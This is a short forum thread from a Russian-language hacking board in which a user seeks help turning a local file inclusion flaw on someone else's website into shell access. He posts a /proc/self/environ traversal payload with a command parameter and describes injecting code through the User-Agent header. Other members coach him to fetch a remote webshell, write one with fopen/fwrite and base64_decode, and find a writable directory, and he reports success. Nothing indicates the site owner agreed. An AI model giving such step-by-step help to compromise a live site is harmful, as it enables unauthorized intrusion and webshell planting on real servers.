HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу LFI problems
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.10.2016, 23:12
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию
I've found a site with LFI include.

Trying to reach shell:

?page=../../../../../../../../../../../../proc/self/environ&cmd=ls;

user-agent -

error - Parse error: syntax error, unexpected T_VARIABLE, expecting T_STRING in /proc/164512/environ on line 1

Help plz.
 
Ответить с цитированием

  #2  
Старый 04.10.2016, 23:15
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию
When i tried to load shell with User-Agent

i've got error - Warning: copy(www.somesite.com/shell.php) [function.copy]: failed to open stream: No such file or directory in /proc/178928/environ on line 1
 
Ответить с цитированием

  #3  
Старый 04.10.2016, 23:18
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию
by the way, i can reach phpinfo with this user-agent -
 
Ответить с цитированием

  #4  
Старый 05.10.2016, 00:01
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Цитата:
Сообщение от billybonse  
billybonse said:

When i tried to load shell with User-Agent
i've got error -
Warning
: copy(
www.somesite.com/shell.php
) [
function.copy
]: failed to open stream: No such file or directory in
/proc/178928/environ
on line
1
Change www. to http://www. and make sure the webshell is served in plaintext, not as a rendered html page.
 
Ответить с цитированием

  #5  
Старый 05.10.2016, 00:05
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию
the same error:

Warning: copy(1.php) [function.copy]: failed to open stream: Permission denied in /proc/383125/environ on line 1
 
Ответить с цитированием

  #6  
Старый 05.10.2016, 01:42
ol1ver
Guest
Сообщений: n/a
Провел на форуме:
55143

Репутация: 0
По умолчанию
Try make file and write content

http://php.net/manual/en/function.fwrite.php

Код:
Code:
$fp = fopen('shell.php', 'w+');
fwrite($fp, base64_decode('BASE64_BODY'));
fclose($fp);
 
Ответить с цитированием

  #7  
Старый 05.10.2016, 03:09
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Цитата:
Сообщение от billybonse  
billybonse said:

the same error:
Warning
: copy(1.php) [
function.copy
]: failed to open stream: Permission denied in
/proc/383125/environ
on line
1
It's not the same error. It means the webserver user doesn't have write permissions to the current directory. You've gotta find a writable directory and chdir to it before making upload requests.
 
Ответить с цитированием

  #8  
Старый 05.10.2016, 09:39
billybonse
Guest
Сообщений: n/a
Провел на форуме:
12164

Репутация: 1
По умолчанию
problem solved, thx
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ